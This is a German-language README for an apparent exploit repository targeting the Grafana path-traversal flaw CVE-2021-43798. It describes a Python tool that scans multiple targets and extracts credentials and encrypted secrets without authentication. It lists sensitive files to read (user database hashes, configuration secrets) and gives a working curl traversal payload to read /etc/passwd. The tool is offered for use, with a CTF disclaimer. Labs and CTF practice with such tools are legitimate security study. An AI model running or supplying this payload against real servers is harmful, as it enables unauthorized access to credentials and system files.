
📂 Grafana LFI Exploit (CVE-2021-43798). Automatisierte Extraktion von Anmeldeinformationen und Konfiguration. 🕵️
🚀 Grafana LFI Exploit (CVE-2021-43798)
Automatisierungsskript in Python 3 zur Ausnutzung der Local File Inclusion (LFI) Schwachstelle in Grafana (Versionen 8.0.0 bis 8.3.0). Dieser Exploit ermöglicht einen Directory Traversal, um sensible Betriebssystemdateien ohne Authentifizierung zu lesen. ✨ Funktionen
Python 3.10+ Kompatibilität: Gepatcht für die Verwendung mit modernen Python-Versionen (Korrektur von collections.Mapping).
Batch-Scanning: Fähigkeit zur Verarbeitung mehrerer Ziele über eine Datei targets.txt.
Datenentschlüsselung: Enthält Module zur Verwaltung von Sitzungen und verschlüsselten Grafana-Daten.
Optimiert für CTF: Saubere und direkte Ausgabe, ideal für Laborumgebungen wie HackTheBox und TryHackMe.
🛠️ Voraussetzungen und Installation
Aufgrund der Abhängigkeiten von alten Bibliotheken wird empfohlen, die folgenden Pakete zu installieren: Bash
pip3 install PyInquirer termcolor requests pycryptodome --break-system-packages
Hinweis: Wenn Sie Python 3.10 oder höher verwenden, enthält das Skript einen automatischen Patch für die Kompatibilität mit collections.abc.
🚀 Verwendung
Ziele konfigurieren: Fügen Sie die URLs (mit Port) in die Datei targets.txt ein.
Bash
echo "http://10.129.234.47:3000" > targets.txt
Exploit ausführen:
Bash
python3 exploit.py
🎯 Häufige Leseziele (LFI)
Nach der Ausführung können Sie versuchen, kritische Dateien zu lesen wie:
/etc/passwd (Systembenutzer)
/var/lib/grafana/grafana.db (Datenbank mit Benutzer-Hashes)
/etc/grafana/grafana.ini (Konfiguration und Geheimnisse)
💡 Alternative Methode (Manuell)
Wenn Sie das Skript nicht verwenden möchten, können Sie das LFI direkt über curl ausnutzen: Bash
curl --path-as-is "http://<TARGET_IP>:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
⚠️ Haftungsausschluss
Dieses Repository wurde ausschließlich zu Bildungszwecken und zur Verwendung in kontrollierten Umgebungen (CTFs, Labors) erstellt. Der Autor übernimmt keine Verantwortung für den Missbrauch dieses Tools. 🏷️ Themen (Tags)
grafana, cve-2021-43798, lfi, exploit, pentesting, hackthebox, python3, directory-traversal